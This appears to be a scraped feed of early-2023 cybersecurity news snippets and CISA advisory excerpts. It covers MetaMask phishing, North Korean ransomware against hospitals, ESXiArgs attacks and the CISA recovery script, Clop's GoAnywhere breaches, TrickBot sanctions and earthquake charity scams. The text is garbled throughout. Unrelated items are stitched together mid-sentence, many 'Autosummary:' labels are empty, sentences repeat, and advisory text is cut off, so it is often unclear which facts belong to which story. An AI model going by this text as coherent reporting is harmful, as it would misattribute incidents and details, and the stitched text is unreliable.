MetaMask has issued an alert today about the phishing emails, and DHL generally warns users that: Official DHL communication is always sent from @dhl.com, @dpdhl.com, @dhl.de, @dhl.fr or another country domain after @dhl The company never uses @gmail, @yahoo or other free email services to send emails They never link to a website other than their own (starting with, for example, https://dhl.com/, https://dpdhl.com/, or a country/campaign website) It’s impossible to gauge how many users fell for the scam. "Autosummary:
For instance, ICS honeypots like Conpot, XPOT, and CryPLH can simulate the Modbus, S7, IEC-104, DNP3 and other protocols. Conpot is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. is a low-interactive honeypot that can simulate the IEC104, Modbus, BACnet, HTTP, and other protocols, which can be easily deployed and configured. With the development of cybersecurity technology, deception has been applied in various circumstances like the web, databases, mobile apps, and IoT. Deception technology has been embodied in some ICS honeypot applications in the OT field. With some deception applications, for instance honeypots, the operating environment and configuration can be simulated, thus luring the attacker to penetrate the fake target. "Autosummary:
Tonto Team, also called Bronze Huntley, Cactus Pete, Earth Akhlut, Karma Panda, and UAC-0018, is a suspected Chinese hacking group that has been linked to attacks targeting a wide range of organizations in Asia and Eastern Europe. "Autosummary:
Based on filed reports, the most popular platforms among fraudsters to contact potential victims are Facebook (28%) and Instagram (29%), while the top payment methods are cryptocurrency (34%) and bank wire transfers/payments (27%). "Three vulnerabilities found in a variety of Korenix JetWave industrial access points and LTE cellular gateways may allow attackers to either disrupt their operation or to use them as a foothold for further attacks, CyberDanube researchers have found. “If such a device is acting as key device in an industrial network, or controls various critical equipment via serial ports, more extensive damage in the corresponding network can be done by an attacker,” the researchers noted. … More
The post Vulnerabilities open Korenix JetWave industrial networking devices to attack appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The organization maintained over a hundred bank accounts in various Spanish banks, using them to deposit their criminal proceeds, withdraw cash from ATMs, send it to international accounts, or convert it to cryptocurrency. "Categories: News Tags: France Tags: law Tags: 72 hours Tags: cyberincident Tags: insurance A French law has been announced that requires victims of a cyberincident to report within 72 hours after discovery. We have heard similar proposals that may come through |
The post French law to report cyberincidents within 3 days to become effective soon appeared first on Malwarebytes Labs.
"Autosummary:
Cybercrime costs include damage and destruction of data, stolen money, lost productivity, theft of intellectual property, theft of personal and financial data, embezzlement, fraud, post-attack disruption to the normal course of business, forensic investigation, restoration and deletion of hacked data and systems, and reputational harm.As Mark continued to explain: “Failure to report can cause serious problems: In 2017, one of the early "big game" ransomware gangs, SamSam, was widely reported to be targeting government and healthcare institutions, because it seemed to attack them much more often. On January 24, 2023 France passed a law (Article L12-10-1 of the Insurance Code) that victims of cybercrime are required to report the incident within 72 hours after discovery, if they want to be eligible for compensation by the insurance for losses and damages caused by the attack. "Categories: News Categories: Ransomware Tags: CISA Tags: ransomware Tags: Democratic People’s Republic of Korea Tags: DPRK Tags: North Korea Tags: WannaCry Tags: EternalBlue Tags: Lazarus Group Tags: APT Tags: Magniber Tags: Magnitude exploit kit Tags: exploit kit Tags: EK Tags: Andariel Tags: Silent Chollima Tags: Stonefly Tags: Maui Tags: H0lyGh0st Tags: PLUTONIUM Tags: Conti The tactics of North Korean-sponsored ransomware cyberattacks against the healthcare sector and other vital infrastructure are highlighted in the latest #StopRansomware alert. |
The post CISA issues alert with South Korean government about DPRK"s ransomware antics appeared first on Malwarebytes Labs.
"Autosummary:
" DPRK ransomware has significantly altered the face of ransomware, tuning it up from a simple locker and then making it more disruptive, lucrative, and, in some cases, destructive. H0lyGh0st, like other current ransomware gangs, favors double-extortion tactics, maintains a leak site, and targets small and medium-sized enterprises (SMEs).Once it arrives on target networks, it encrypts servers responsible for record-keeping, diagnosing, imaging services, and others. "North Korea"s cyber program poses a growing espionage, theft, and attack threat," the Annual Threat Assessment report in 2021 said. "Categories: Business G2 has released their Winter 2023 reports, ranking Malwarebytes as the leader across a number of endpoint protection categories based on customer reviews. |
The post Malwarebytes recognized as endpoint security leader by G2 appeared first on Malwarebytes Labs.
"Autosummary:
Summary Report Malwarebytes has ranked #1 for 5 reports OVERALL across all vendors and market segments Grid (main report) Results Index Relationship index Implementation Index Usability Index Malwarebytes has ranked #1 for 5 Mid-Market reports Grid report (main report) Results Index Relationship Index Implementation Index Usability Index Malwarebytes has ranked #1 for 1 Small Business reports Grid report (main report) Fastest implementation Security teams need a solution that is quick to deploy, easy to set-up, and uncomplicated. GET A FREE BUSINESS TRIAL More resources Malwarebytes receives highest rankings in recent third-party tests Why MRG-Effitas matters to SMBs MITRE ATT&CK® Evaluation results: Malwarebytes’ efficiency, delivered simply, earns high marks Why MITRE matters to SMBs "Small and medium-sized businesses have good reason to be concerned about the loss of data and financial impacts
The post Confident cybersecurity means fewer headaches for SMBs appeared first on WeLiveSecurity
"Autosummary:
“Keeping up,” for some, means how to, practically speaking, face concerns about malware, web-based attacks, ransomware, third-party security issues, and critical or high-severity software vulnerabilities. With less than a third of respondents VERY confident in any area of cybersecurity, including IT team cybersecurity knowledge (32%), the speed with which they can identify, isolate and respond to a threat (30%), access to third-party experts (29%), their reported sentiments beg the question of which businesses are confident enough to keep security in-house. "Autosummary:
List of sites targeted by the malware (Fortinet) Some of the targeted sites include: Coinbase.com Gmail.com YouTube.com Instagram.com PayPal.com Telegram.com Hotmail.com Outlook.com Aliexpress.com ExpressVPN.com eBay.com Playstation.com xbox.com Netflix.com Uber.com After gathering all data it finds on the compromised machine, the malware uses its ‘upload’ function to upload the stolen data using a Discord webhook, which posts it to the threat actor"s server. "The Russian Government proposed to give a sort of immunity to the hackers that operate in the interests of Moscow. Russian media reported that Alexander Khinshtein, the head of the Duma committee on information policy, announced that the Russian government is evaluating to avoid punishing hackers acting in the interests of Moscow. “The question of […]
The post Russian Government evaluates the immunity to hackers acting in the interests of Russia appeared first on Security Affairs.
"Autosummary:
"Autosummary:
MetaMask phishing email from Namecheap Source: BleepingComputer.com "We are writing to inform you that in order to continue using our wallet service, it is important to obtain KYC (Know Your Customer) verification. MetaMask phishing page Source: BleepingComputer Once a user provides either the recovery phrase or private key, the threat actors can use them to import the wallet to their own devices and steal all the funds and assets. "The Technion – Israel Institute of Technology was breached on Sunday by a new anti-Israel threat actor calling itself DarkBit. Technion – Israel Institute of Technology is Israel’s top technology research university and a leading center for cyber security education. A new anti-Israel threat actor calling itself DarkBit is claiming responsibility for the ransomware attack that breached the […]
The post The Israel Institute of Technology Technion suffered a ransomware attack appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Israel Institute of Technology Technion) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
The development underscores the growing adoption of the technique by multiple threat actors, namely BlackByte, Earth Longzhi, Lazarus Group, and OldGremlin, to power their intrusions with elevated privileges. "US CISA added actively exploited flaws in Fortra MFT, Intel driver, and TerraMaster NAS to its Known Exploited Vulnerabilities Catalog. US CISA added actively exploited flaws in Fortra MFT, Intel driver, and TerraMaster NAS, respectively tracked as CVE-2023-0669, CVE-2015-2291, and CVE-2022-24990, to its Known Exploited Vulnerabilities Catalog. The CVE-2015-2291 flaw (CVSS v3 score 7.8) is a […]
The post CISA adds Fortra MFT, TerraMaster NAS, Intel driver Flaws, to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
"Autosummary:
A majority of the infections are located in France, the U.S., Germany, Canada, the U.K., the Netherlands, Finland, Turkey, Poland, and Taiwan. "The Clop ransomware group claims to have breached over 130 organizations exploiting the GoAnywhere MFT zero-day. The Clop ransomware group claims to have stolen sensitive data from over 130 organizations by exploiting a zero-day vulnerability (CVE-2023-0669) in Fortra’s GoAnywhere MFT secure file transfer tool, BleepingComputer reported. Fortra immediately addressed the flaw with the release of […]
The post Clop ransomware claims the hack of 130 orgs using GoAnywhere MFT flaw appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Clop ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Socure has joined the FIDO (Fast IDentity Online) Alliance to advance identity verification standards that make it easy to verify identity online and protect against identity fraud across industries. Socure’s mission is to verify 100% of good identities in real-time and completely eliminate identity fraud for every applicant on the internet. Its graph-defined platform combines advanced machine learning and artificial intelligence with all elements of a consumer’s identity to deliver the most accurate and robust … More
The post Socure joins FIDO Alliance to improve identity verification industry standards appeared first on Help Net Security.
"Autosummary:
"Researchers reported that the top-of-the-line Android mobile devices sold in China are shipped with malware. China is currently the country with the largest number of Android mobile devices, but a recent study conducted by researchers from the University of Edinburgh and the Trinity College of Dublin revealed that top-of-the-line Android devices sold in the country […]
The post Android mobile devices from top vendors in China have pre-installed malware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Android mobile devices) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Visibility relies on three pillars: Actionable information - that can be used to mitigate attacks Reliable information - that minimizes the number of false positives Timely information - to ensure mitigation happens before the attack has an impact Once an organization has complete visibility to the activity on their network they can contextualize the data, decide whether the activity witnessed should be allowed, denied, monitored, restricted (or any other action) and then have the ability to enforce this decision. Here"s Watch Out for in the Coming Months According to ongoing security research conducted by Cato Networks Security Team, they have identified two additional vulnerabilities and exploit attempts that they recommend including in your upcoming security plans: 1. Log4j While Log4j made its debut as early as December of 2021, the noise its making hasn"t died down.Breaches are never just a phishing problem, or a credentials problem, or a vulnerable system problem - they are always a combination of multiple compromises performed by the threat actor," said Etay Maor, Sr. Director of Security Strategy at Cato Networks.The underlying technologies to implement a multiple choke point approach are full network visibility via a cloud-native backbone, and a single pass security stack that"s based on ZTNA." said Etay Maor, Sr. Director of Security Strategy at Cato Networks. "Autosummary:
The individuals designated under sanctions are Vitaly Kovalev (aka Alex Konor, Bentley, or Bergen), Maksim Mikhailov (aka Baget), Valentin Karyagin (aka Globus), Mikhail Iskritskiy (aka Tropa), Dmitry Pleshevskiy (aka Iseldor), Ivan Vakhromeyev (aka Mushroom), and Valery Sedletski (aka Strix). "Autosummary:
"Autosummary:
[1, 2], the U.S. agency notes that the "have also been observed using or possessing publicly available tools for encryption:" BitLocker (abused of a legitimate tool) Deadbolt ech0raix GonnaCry Hidden Tear Jigsaw LockBit 2.0 My Little Ransomware NxRansomware Ryuk YourRansom To note, BleepingComputer is aware that more than half of these lockers are available from public sources but could not confirm this for all of them. "US and South Korean agencies have issued a joint cybersecurity advisory describing the tactics, techniques and procedures used by North Korean hackers to deploy “state-sponsored” ransomware on hospitals and other organizations that can be considered part of the countries’ critical infrastructure. “The authoring agencies assess that an unspecified amount of revenue from these cryptocurrency operations supports DPRK national-level priorities and objectives, including cyber operations targeting the United States and South Korea governments—specific targets include Department … More
The post North Korea targets US, South Korean hospitals with ransomware to fund further cyber operations appeared first on Help Net Security.
"Autosummary:
They “purposely obfuscate their involvement by operating with or under third-party foreign affiliate identities and use third-party foreign intermediaries to receive ransom payments,” and “use virtual private networks (VPNs) and virtual private servers (VPSs) or third-country IP addresses to appear to be from innocuous locations instead of from the Democratic People’s Republic of Korea.” "Autosummary:
"The TA886 hacking group targets organizations in the United States and Germany with new spyware tracked as Screenshotter. A recently discovered threat actor, tracked as TA886 by security firm Proofpoint, is targeting organizations in the United States and Germany with new malware dubbed Screenshotter. The experts first spotted the attacks attributed to this threat actor […]
The post New TA886 group targets companies with custom Screenshotter malware appeared first on Security Affairs.
"Autosummary:
It can steal crypto wallets, steam accounts, passwords from browsers, FTP clients, chat clients (e.g. Telegram, Discord), email clients, VPN configurations, cookies, grab files, and more. Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Screenshotter) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"Autosummary:
As we reported late last year, the Royal ransomware group - which unusually does not follow the Ransomware-As-A-Service model and rejects affiliates - has launched numerous attacks, including against healthcare organisations and telecoms firm Intrado. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include @LawrenceAbrams, @malwrhunterteam, @billtoulas, @demonslay335, @struppigel, @PolarToffee, @fwosar, @BleepinComputer, @Ionut_Ilascu, @serghei, @Seifreed, @jfslowik, @CISAgov, @LabsSentinel, @BushidoToken, @ASEC_Analysis, @pcrisk, @ValeryMarchive, and @BrettCallow. February 8th 2023 New ESXiArgs ransomware attacks are now encrypting more extensive amounts of data, making it much harder, if not impossible, to recover encrypted VMware ESXi virtual machines. "Autosummary:
" As Emsisoft shared in January, ransomware attacks have impacted more than 200 hundred larger organizations in the U.S. public sector in 2022 across government, educational, and healthcare verticals. "Autosummary:
"Autosummary:
Organizations that had their servers hacked by Clop include, among others, energy giant Shell, supermarket giant Kroger, cybersecurity firm Qualys, and multiple universities worldwide (e.g., Stanford Medicine, University of Colorado, University of Miami, University of Maryland Baltimore (UMB), and the University of California). "A ransomware attack hit the City of Oakland this week, forcing it to take all systems offline in response to the incident. The City of Oakland disclosed a ransomware attack, the security breach began on Wednesday night. In an abundance of caution, the City of Oakland has taken impacted systems offline, while they work to […]
The post Ransomware attack hit the City of Oakland appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "North Korea-linked APT groups conduct ransomware attacks against healthcare and critical infrastructure facilities to fund its activities. Ransomware attacks on critical infrastructure conducted by North Korea-linked hacker groups are used by the government of Pyongyang to fund its malicious cyber operations, U.S. and South Korean agencies warn. US CISA published a Cybersecurity Advisory (CSA) to […]
The post DPRK fund malicious cyber activities with ransomware attacks on critical Infrastructure appeared first on Security Affairs.
"Autosummary:
Attackers used privately developed ransomware, such as Maui and H0lyGh0st along with other ransomware families, including BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486].Attackers used privately developed ransomware, such as Maui and H0lyGh0st along with other ransomware families, including BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486]. "Logpoint has released a ChatGPT integration for Logpoint SOAR in a lab setting. It allows the users to experiment with the potential of the AI-driven chatbot and discover how the technology could apply in cybersecurity operations. “We’re excited to enable our customers to explore the possibilities of using technologies such as ChatGPT to reduce part of their workload,” says Edy Almer, Logpoint Product Manager for Threat Detection and Incident Response. “Staying up to date with … More
The post ChatGPT integration for Logpoint SOAR allows users to explore its potential in cybersecurity appeared first on Help Net Security.
"Autosummary:
"Opscura has received $9.4M in Series A funding as it scales to engage further U.S. partners and customers seeking to protect and connect their critical operations. Founded in Spain as Enigmedia, the new global entity Opscura is also launching a new brand, global management team, and product upgrades in addition to the capital infusion led by Anzu Partners, with investments from Dreamit and Mundi Ventures. Opscura’s technology adds a layer to the industrial cybersecurity ecosystem … More
The post Opscura raises $9.4 million to address industrial cybersecurity challenges appeared first on Help Net Security.
"Autosummary:
Customers across various industries, including renewable energy, transportation, manufacturing, government, and chemical also rely on Opscura to solve industrial cybersecurity, compliance, and digital transformation challenges. "Autosummary:
For even larger files, like a 450GB file, the amount of skipped data rises dramatically, with the size_step becoming "4607," now alternating between encrypting 1MB and skipping 4.49 GB of data. "The popular notion might view the rail industry as a laggard compared to auto or high-tech manufacturing when embracing Industry 4.0. Yet railways are increasingly dependent on sophisticated connected systems to enhance efficiency and customer satisfaction. Rail industry needs to work closely with cybersecurity vendors With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding … More
The post Inadequate cybersecurity investments leave rail industry at risk appeared first on Help Net Security.
"Autosummary:
Rail industry needs to work closely with cybersecurity vendors With the advent of connected online systems and the convergence of Operational Technology (OT) and Information Technology (IT) systems, network and data-sharing security between IT and OT systems is proceeding to become an integral component of safety, providing new market opportunities in the rail, freight, and transit sector. "Between July–December 2022, the median open rate for text-based business email compromise (BEC) attacks was nearly 28%, according to Abnormal Security. Business email and supply chain compromise as attack strategies Additionally, of the malicious emails that were read, an average of 15% were replied to. And while less than one percent of recipients engaged with more than one attack, 36% of replies were initiated by employees who had previously engaged with an earlier attack. When … More
The post Cybercriminals exploit volatile job market for targeted email attacks appeared first on Help Net Security.
"Autosummary:
Employees: Greatest asset or biggest cybersecurity liability Additional findings from the report include: Only 2.1% of known attacks are reported to the security team by employees, and 84% of employee reports to phishing mailboxes are either safe emails or graymail. "Autosummary:
In these replies, the scammer posts their fraudulent wallet address to dupe donors: Scammer flooding Twitter replies with illicit crypto addresses (BleepingComputer) In yet another scam, we saw individual Twitter users claiming to raise crypto donations: Fake crypto donation addresses (Twitter) Searching these wallet addresses online quickly revealed that these had been associated with suspicious accounts and webpages (including adult content threads on the Russian social media website, VK [1, 2]). The "Wladimir Charity Foundation" website had earlier been claiming to raise funds for Ukraine war victims: Dubious "Wladimir Foundation" charity website listing crypto address (BleepingComputer) Also circulating lately are scam emails claiming to originate from "UNICEF" partners: Fake "Earthquake Relief" emails claim to be associated with UNICEF (Bitdefender) "Scammers claim they are a world charity organization in collaboration with UNICEF and call for donations in support of the affected children and families in both countries," Bîzgă points out in the same report. These emails urge recipients to support earthquake victims by making crypto donations to wallet addresses that are, predictably, not associated with any known government or trustworthy entities: Fake Turkey/Syria fundraiser email claims to originate from a dodgy charity (Bitdefender) "The domain hosting the so-called Wladimir Charity Foundation was created on Oct. 3, 2022, and is already blacklisted by our anti-spam and anti-fraud filters," states Bitdefender"s Alina Bîzgă in the report. Genuine PayPal.com abused in Turkey relief scam (BleepingComputer) BleepingComputer further observed the PayPal fundraiser had collected a total of $900 in donations, with the creator of the page "donating" $500 to their own "cause" to make the fundraiser appear authentic: Donation amounts raised by the PayPal "fundraiser" (BleepingComputer) BleepingComputer has reported this fundraiser to PayPal and approached the company for comment. "ASCON is the name of the group of lightweight authenticated encryption and hashing algorithms that the U.S. National Institute of Standards and Technology (NIST) has chosen to secure the data generated by Internet of Things (IoT) devices: implanted medical devices, keyless entry fobs, “smart home” devices, etc. Gathered under the ASCON label are seven algorithms, some of which may not end up being included in the lightweight cryptography standard NIST is plans to publish later … More
The post NIST chooses encryption algorithms for lightweight IoT devices appeared first on Help Net Security.
"Autosummary:
ASCON, developed in 2014 by a team of cryptographers from Graz University of Technology, Infineon Technologies, Lamarr Security Research and Radboud University, has now been chosen as the winner of the contest, due to its many qualities, which include speed, ease of implementation, energy efficiency, and scalability. "Autosummary:
"Autosummary:
This includes BlackCat, Royal Group, AvosLocker, Karakurt, LockBit, Silent Ransom, and DagonLocker. As the malware became widely detected by security software, the developers launched new malware families, such as BazarBackdoor, Anchor, and BumbleBee, to provide more stealthy infection of targets. "Autosummary:
"Autosummary:
Alternatively, local attackers can break into industrial Wi-Fi access points and cellular gateways by targeting on-site Wi-Fi or cellular channels, leading to adversary-in-the-middle (AitM) scenarios with adverse potential impact. "Autosummary:
"Autosummary:
AWS phishing page (Sentinel One) Second phishing step, requesting the user password (Sentinel One) The phishing domains seen by Sentinel Labs are: aws1-console-login[.]us aws2-console-login[.]xyz aws1-ec2-console[.]com aws1-us-west[.]info An interesting feature of the phishing pages is that their author has included a JavaScript function to disable right clicks, middle mouse buttons, or keyboard shortcuts. "Autosummary:
Part of the stealer"s code (Proofpoint) Its capabilities include stealing cryptocurrency wallets, credentials, and cookies stored in web browsers, FTP clients, Steam accounts, Telegram and Discord accounts, VPN configurations, and email clients. "Note: This Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and various ransomware threat actors. These #StopRansomware advisories detail historically and recently observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn about other ransomware threats and no-cost resources.
The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.
This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector. This advisory highlights TTPs and IOCs DPRK cyber actors used to gain access to and conduct ransomware attacks against Healthcare and Public Health (HPH) Sector organizations and other critical infrastructure sector entities, as well as DPRK cyber actors’ use of cryptocurrency to demand ransoms.
The authoring agencies assess that an unspecified amount of revenue from these cryp "
Autosummary:
Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486].Actors have also been observed using or possessing publically available tools for encryption, such as BitLocker, Deadbolt, ech0raix, GonnaCry, Hidden Tear, Jigsaw, LockBit 2.0, My Little Ransomware, NxRansomware, Ryuk, and YourRansom [T1486].The United States National Security Agency (NSA), the U.S. Federal Bureau of Investigation (FBI), the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the U.S. Department of Health and Human Services (HHS), the Republic of Korea (ROK) National Intelligence Service (NIS), and the ROK Defense Security Agency (DSA) (hereafter referred to as the “authoring agencies”) are issuing this joint Cybersecurity Advisory (CSA) to highlight ongoing ransomware activity against Healthcare and Public Health Sector organizations and other critical infrastructure sector entities.This CSA provides an overview of Democratic People’s Republic of Korea (DPRK) state-sponsored ransomware and updates the July 6, 2022, joint CSA North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.Actors procure infrastructure, IP addresses, and domains with cryptocurrency generated through illicit cybercrime, such as ransomware and cryptocurrency theft. "The US and the UK have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US and the UK authorities have sanctioned seven Russian individuals for their involvement in the TrickBot operations. The US Treasury has frozen the assets belonging to the individuals and imposed travel bans against them. The US Treasury […]
The post US and UK sanctioned seven Russian members of Trickbot gang appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Trickbot) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share OnThese malicious cyber activities have targeted critical infrastructure, including hospitals and medical facilities during a global pandemic, in both the U.S. and the U.K.” This is the first time the UK government has imposed such kind of sanctions, its authorities collaborated with the U.S. Department of the Treasury’s Office of Foreign Assets Control and the U.K.’s Foreign, Commonwealth, and Development Office; National Crime Agency; and His Majesty’s Treasury.: “By sanctioning these cyber criminals, we are sending a clear signal to them and others involved in ransomware that they will be held to account.” said UK Foreign Secretary James Cleverly. "Experts warn of new ESXiArgs ransomware attacks using an upgraded version that makes it harder to recover VMware ESXi virtual machines. Experts spotted a new variant of ESXiArgs ransomware targeting VMware ESXi servers, authors have improved the encryption process, making it much harder to recover the encrypted virtual machines. The new variant was spotted less than a […]
The post A new variant of ESXiArgs ransomware makes recovery much harder appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ESXiArgs ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
Defender"s token integrity modification (Trend Micro) The third-stage downloads the final payload, Enigma Stealer, from a private Telegram channel, which Trend Micro says is a modified version of Stealerium, an open-source information-stealing malware. "Autosummary:
"Categories: Business Application Block helps organizations easily thwart unwanted applications from launching on Windows endpoints. |
The post Introducing Malwarebytes Application Block: How to block unauthorized software from executing on Windows endpoints appeared first on Malwarebytes Labs.
"Autosummary:
For a technical overview of Application Block for Nebula, click here: https://service.malwarebytes.com/hc/en-us/sections/10604417341587-Application-Block For a technical overview of Application Block for OneView, click here: https://service.malwarebytes.com/hc/en-us/sections/13023671722387-Application-Block Enable Blocking When setting or modifying a policy in the Nebula console, go to the Software management tab at the bottom. Plugging the holes in your Windows endpoint security Application Block is just the latest addition to our ever-expanding collection of security modules for Nebula, which include Vulnerability and Patch Management and DNS Filtering. "Categories: News Tags: ryuk Tags: ransomware Tags: guilty Tags: encrypt Tags: ransom Tags: cryptocurrency Tags: bitcoin We take a look at a guilty plea made in relation to Ryuk ransomware proceeds, and how you can best protect yourself from the threat of ransomware. |
The post Ryuk ransomware laundering leads to guilty plea appeared first on Malwarebytes Labs.
"Autosummary:
After receiving the ransom payments, the Ryuk actors, defendants, and others involved in the scheme engaged in various financial transactions, including international financial transactions, to conceal the nature, source, location, ownership, and control of the ransom proceeds. From the indictment release: The Ryuk actors used anonymous private wallets in their ransom notes, allowing them immediately to conceal the nature, location, source, ownership, and control of the ransom payments. Malwarebytes Endpoint Detection and Response offers built-in ransomware protection, 72-hour ransomware rollback, and zero-day ransomware protection. Whether we’re talking single, double, or even triple threat ransomware, the problem is very real. "Autosummary:
"Autosummary:
" While the GitHub project page has the steps you need to recover VMs, in summary, the script will clean up a virtual machine"s encrypted files and then attempt to rebuild the virtual machine"s .vmdk file using the unencrypted flat file. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a script to recover VMware ESXi servers infected with ESXiArgs ransomware. Good news for the victims of the recent wave of ESXiArgs ransomware attacks, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released a script to allow them to recover encrypted VMware ESXi servers. The […]
The post US CISA releases a script to recover servers infected with ESXiArgs ransomware appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ESXiArgs ransomware) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
Steal SSH known hosts Steal data from PuTTY Steal stored passwords Take screenshots Create a directory List a directory Run a shell command Steal an arbitrary file The malware uses the following PowerShell code to steal passwords from the Windows Vault, the system"s built-in password manager, where saved credentials are stored in AES-256 encrypted form. "According to the latest data, the number of ESXiArgs ransomware victims has surpassed 3,800, and CISA has published a recovery script for victim organizations. Fixing the mess The attacks started late last week and are still ongoing. Investigations point to a new family of ransomware dubbed ESXiArgs by the researchers – though, according to Paul Ducklin, Sophos Head of Technology for the Asia Pacific region, it should be just Args, as it’s a Linux program … More
The post CISA releases ESXiArgs ransomware recovery script appeared first on Help Net Security.
"Autosummary:
The malware attempts to kill off running virtual machines, export an ESXi filesystem volume list, find important VMWare files for each volume, and call a general-purpose file scrambling tool for each file found, Ducklin explained. "Autosummary:
"The Computer Emergency Response Team of Ukraine (CERT-UA) warns of a new wave of attacks against state authorities to deploy the Remcos software. The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of a phishing campaign aimed at state authorities that involves the use of the legitimate remote access software Remcos. The phishing emails, […]
The post Ukraine CERT-UA warns of phishing attacks employing Remcos software appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Remcos) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
"Autosummary:
"This backdoor permits the execution of any JavaScript acquired through HTTP, providing the attacker the power to both conceal and modify the exploit code at their discretion without undergoing the game mode verification process, which can be dangerous, and updating the entire custom game mode," Vojtěšek said. "Autosummary:
Android 14 enhances security Starting with the "Runtime receivers," which enable apps to receive intents broadcast by the system or other applications, all apps targeting Android 14 must declare if they need to receive information from other apps or if they should be limited to system "broadcasts. "Autosummary:
Money Lover app on the Play Store (BleepingComputer) Money Lover allows users to create "shared wallets" with specific users, like family members or coworkers, to log transactions to collaborate in expense logging and monitoring. "Autosummary:
Specops: Password Policy Block words common to your organization with custom dictionaries Prevent the use of 3+ billion compromised passwords with Breached Password Protection Find and remove compromised passwords in your environment Real-time, dynamic feedback at password change Block usernames, display names, specific words, consecutive characters, incremental passwords, and reuse a part of the current password Granular, GPO-driven targeting for any GPO level, computer, user, or group population Protecting against ransomware Ransomware is a growing concern for organizations worldwide, as the fallout and consequences of suffering a ransomware attack are usually severe. Let"s look at the following strategies for preventing the domino effect of a ransomware attack: Patching Securing remote access systems Strengthen password security Patching Patching is a vital aspect of preventing a ransomware attack. As a result, protecting against ransomware attacks and the fallout requires organizations to have a multi-pronged approach to strengthen their security, including patching, securing remote access, and increasing password security. "The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory (CSA) in response to the ongoing ransomware campaign, known as “ESXiArgs.” Malicious actors may be exploiting known vulnerabilities in VMware ESXi servers that are likely running unpatched and out-of-service or out-of-date versions of VMware ESXi software to gain access and deploy ransomware. The ESXiArgs ransomware encrypts configuration files on ESXi servers, potentially rendering virtual machines (VMs) unusable.
CISA has released an ESXiArgs recovery script at github.com/cisagov/ESXiArgs-Recover. Organizations that have fallen victim to ESXiArgs ransomware can use this script to attempt to recover their files. This CSA provides guidance on how to use the script.
ESXiArgs actors have compromised over 3,800 servers globally. CISA and FBI encourage all organizations managing VMware ESXi servers to:
If malicious actors have compromised your organization with ESXiArgs ransomware, CISA and FBI recommend following the script and guidance provided in this CSA to attempt to recover access to your files.
Download the PDF version of this report: pdf, 712 kb.
Note: CISA and FBI will update this CSA as more information becomes available.
Open-source reporting indicates that malicious actors are exploiting known vulnerabilities in VM "
Autosummary:
